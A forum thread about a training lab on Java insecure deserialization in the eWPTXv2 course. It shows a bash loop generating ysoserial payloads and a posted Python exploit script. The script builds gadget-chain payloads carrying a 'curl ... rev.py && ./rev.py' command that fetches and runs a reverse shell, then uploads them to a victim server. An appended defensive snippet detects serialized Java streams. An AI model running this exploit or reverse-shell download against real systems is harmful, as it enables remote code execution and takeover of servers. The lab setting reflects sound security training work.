Is there any video solution available for the "Java Insecure Deserialization - Scenario 1" lab in the eWPTXv2 course?

I’m looking for a video solution or tutorial for the “Java Insecure Deserialization - Scenario 1” lab.

-Thanks.

We don’t have video solutions for labs. But there are solutions in each lab. I’m looking at your conversation with Andres. It looks like you’re missing steps.

Check your file permissions for the payloads in Downloads. Were you able to confirm the payload with tcpdump?

@jmason-joshua17sc
Thanks for the assistance!
Actually, I’m facing a problem while creating the ysoserial payloads as the individual filenames.

while read -r payloadname; do java -jar ../java/ysoserial-master-SNAPSHOT.jar "$payloadname" "ping 172.16.64.3 -c 3" > "$payloadname"; done < payloads.txt

When using the above command, it is supposed to create ysoserial payloads as individual files. (In the above command, I changed the IP and ysoserial path according to my system)
But in this case, I’m facing an error. (Appended the screenshot below)

And I think this is the error; once it’s solved, I can complete this lab.

Thanks.

It looks like it might be your version of java or your permissions.
I haven’t seen this error before.

To fix the problem you have, adding the --illegal-access=warn was sufficient for me.

Anyway, my in-progress exploit code (with minor Python 3 improvements) can be seen below. The reverse shell isn’t working for me (and I have no idea why), but at least you can see requests coming at the Python HTTP server. I hope it helps people. 🙂

import os

import requests
import time
import threading
from datetime import datetime

victimIP = "172.16.64.23"
myIP = "INSERT-YOUR-IP"


def readfile():
    url = f"http://{victimIP}/upload/index.php?sent=OK"
    r = requests.get(url)
    print(r.text)
    print("\n")


def upload(filename):
    now = datetime.now()
    print(f"[+] Used filename: {filename} at timestamp {now.strftime('%H:%M:%S')}")
    url = f"http://{victimIP}/upload/upload.php"
    filepath = f'payloads/{filename}.txt'
    # Close the payload file once the request has been sent
    with open(filepath, 'rb') as fh:
        r = requests.post(url, files={'uploaded_file': fh})


payloads = [
    # 'Spring2',
    # 'JRMPClient',
    # 'CommonsCollections3',
    'CommonsCollections2',
    # 'ObjectPayload',
    # 'MozillaRhino2',
    # 'BeanShell1',
    # 'Myfaces1',
    # 'DynamicDependencies',
    # 'CommonsCollections5',
    # 'AspectJWeaver',
    # 'JRMPListener',
    # 'Hibernate2',
    # 'JBossInterceptors1',
    # 'Groovy1',
    # 'Click1',
    # 'Jdk7u21',
    # 'Jython1',
    # 'JavassistWeld1',
    # 'CommonsCollections4',
    # 'C3P0',
    # 'CommonsCollections7',
    # 'JSON1',
    # 'ROME',
    # 'Wicket1',
    # 'FileUpload1',
    # 'Hibernate1',
    # 'Vaadin1',
    # 'Myfaces2',
    # 'CommonsCollections6',
    # 'Clojure',
    # 'CommonsBeanutils1',
    # 'CommonsCollections1',
    # 'MozillaRhino1',
    # 'URLDNS',
    # 'ReleaseableObjectPayload',
    # 'Spring1',
]

command = f"curl http://{myIP}:8443/rev.py -O rev.py && chmod +x rev.py && ./rev.py"

for payload in payloads:
    os.system(f"java -jar --illegal-access=warn ysoserial.jar {payload} \"{command}\" > {payload}.txt")
    x = threading.Thread(target=upload, args=(payload,))
    x.start()
    readfile()
    time.sleep(2)
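
Added example, not part of any post in this thread or of the course material: when a `java ... > file` run fails as described above, the redirect still leaves an empty or non-serialized file behind, and the same header check lets an upload handler or reviewer recognise Java object streams and the library classes they name. The function names, the watchlist and the `SAMPLE` bytes are constructed assumptions, and the class-name extraction is a heuristic scan rather than a full stream parser.

```python
import re
import struct

STREAM_HEADER = b"\xac\xed\x00\x05"  # STREAM_MAGIC + STREAM_VERSION of a Java object stream
TC_CLASSDESC = b"\x72"               # class descriptor tag: 0x72, u16 length, class name
CLASS_NAME = re.compile(rb"[A-Za-z_$][\w$]*(\.[A-Za-z_$][\w$]*)+")
# Assumption: illustrative watchlist of library packages, not an exhaustive list.
WATCHLIST = ("org.apache.commons.collections", "org.apache.commons.beanutils",
             "org.codehaus.groovy", "org.springframework")


def class_names(data: bytes) -> list:
    """Heuristic scan for class names declared by class descriptors (not a full parser)."""
    names, i = [], len(STREAM_HEADER)
    while (i := data.find(TC_CLASSDESC, i)) != -1 and i + 3 <= len(data):
        (length,) = struct.unpack(">H", data[i + 1:i + 3])
        name = data[i + 3:i + 3 + length]
        if len(name) == length and CLASS_NAME.fullmatch(name):
            names.append(name.decode("ascii"))
            i += 3 + length + 8      # skip the name and the 8-byte serialVersionUID
        else:
            i += 1                   # this 0x72 was ordinary data; keep scanning
    return names


def inspect_upload(data: bytes) -> dict:
    """Classify bytes as empty, not serialized, or a Java object stream."""
    result = {"verdict": "java-serialized", "classes": [], "flagged": []}
    if not data:
        result["verdict"] = "empty"              # e.g. the generator failed and wrote nothing
    elif not data.startswith(STREAM_HEADER):
        result["verdict"] = "not-java-serialized"
    else:
        result["classes"] = class_names(data)
        result["flagged"] = [n for n in result["classes"] if n.startswith(WATCHLIST)]
    return result


def _classdesc(name: str) -> bytes:
    """Constructed sample bytes: TC_OBJECT plus a field-less class descriptor."""
    raw = name.encode("ascii")
    return (b"\x73\x72" + struct.pack(">H", len(raw)) + raw
            + b"\x00" * 8 + b"\x02\x00\x00\x78\x70")


# Constructed sample stream (not a working payload): two empty objects.
SAMPLE = (STREAM_HEADER + _classdesc("java.util.PriorityQueue")
          + _classdesc("org.apache.commons.collections4.comparators.TransformingComparator"))
```

Call `inspect_upload()` on the raw bytes of each file; a verdict of `empty` or `not-java-serialized` means the generator did not write an object stream.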